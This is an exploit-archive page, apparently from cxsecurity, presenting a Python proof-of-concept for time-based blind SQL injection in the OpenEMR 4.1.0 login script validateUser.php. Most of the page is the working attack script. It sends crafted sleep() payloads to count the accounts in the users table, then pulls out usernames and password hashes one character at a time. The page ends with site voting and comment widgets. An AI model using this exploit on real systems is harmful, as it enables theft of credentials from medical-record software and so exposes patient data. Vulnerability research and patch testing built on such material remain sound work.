OpenEMR 4.1.0 - SQL Injection

2021.04.23
Risk: Medium
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

|=========================================================================== | # Exploit Title : OpenEMR 4.1.0 - SQL Injection | | # Author : Ali Seddigh | | # Category : Web Application | | # Vendor Homepage: https://www.open-emr.org/ | | # Software Link: http://sourceforge.net/projects/openemr/files/OpenEMR%20Current/4.1.0/openemr-4.1.0.zip/download | | # Tested on : [Windows ~> 10] | | # Version: 4.1 | | # Date : 2021-04-22 |=========================================================================== #!/usr/bin/env python3 import requests import string import sys print(""" ____ ________ _______ __ __ ___ ____ / __ \____ ___ ____ / ____/ |/ / __ \ / // / < // __ \\ / / / / __ \/ _ \/ __ \/ __/ / /|_/ / /_/ / / // /_ / // / / / / /_/ / /_/ / __/ / / / /___/ / / / _, _/ /__ __/ / // /_/ / \____/ .___/\___/_/ /_/_____/_/ /_/_/ |_| /_/ (_)_(_)____/ /_/ ____ ___ __ _____ ____ __ _ / __ )/ (_)___ ____/ / / ___// __ \ / / (_) / /_/ / / / __ \/ __ / \__ \/ / / / / / / / / /_/ / / / / / / /_/ / ___/ / /_/ / / /___/ / /_____/_/_/_/ /_/\__,_/ /____/\___\_\/_____/_/ """) all = string.printable # edit url to point to your openemr instance url = "http://192.168.56.106/openemr/interface/login/validateUser.php?u=" def extract_users_num(): print("[+] Finding number of users...") for n in range(1,100): payload = '\'%2b(SELECT+if((select count(username) from users)=' + str(n) + ',sleep(3),1))%2b\'' r = requests.get(url+payload) if r.elapsed.total_seconds() > 3: user_length = n break print("[+] Found number of users: " + str(user_length)) return user_length def extract_users(): users = extract_users_num() print("[+] Extracting username and password hash...") output = [] for n in range(1,1000): payload = '\'%2b(SELECT+if(length((select+group_concat(username,\':\',password)+from+users+limit+0,1))=' + str(n) + ',sleep(3),1))%2b\'' #print(payload) r = requests.get(url+payload) #print(r.request.url) if r.elapsed.total_seconds() > 3: length = n break for i in range(1,length+1): for char in all: payload = '\'%2b(SELECT+if(ascii(substr((select+group_concat(username,\':\',password)+from+users+limit+0,1),'+ str(i)+',1))='+str(ord(char))+',sleep(3),1))%2b\'' #print(payload) r = requests.get(url+payload) #print(r.request.url) if r.elapsed.total_seconds() > 3: output.append(char) if char == ",": print("") continue print(char, end='', flush=True) try: extract_users() except KeyboardInterrupt: print("") print("[+] Exiting...") sys.exit() |=========================================================================== | # Discovered By : Ali Triplex |===========================================================================


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top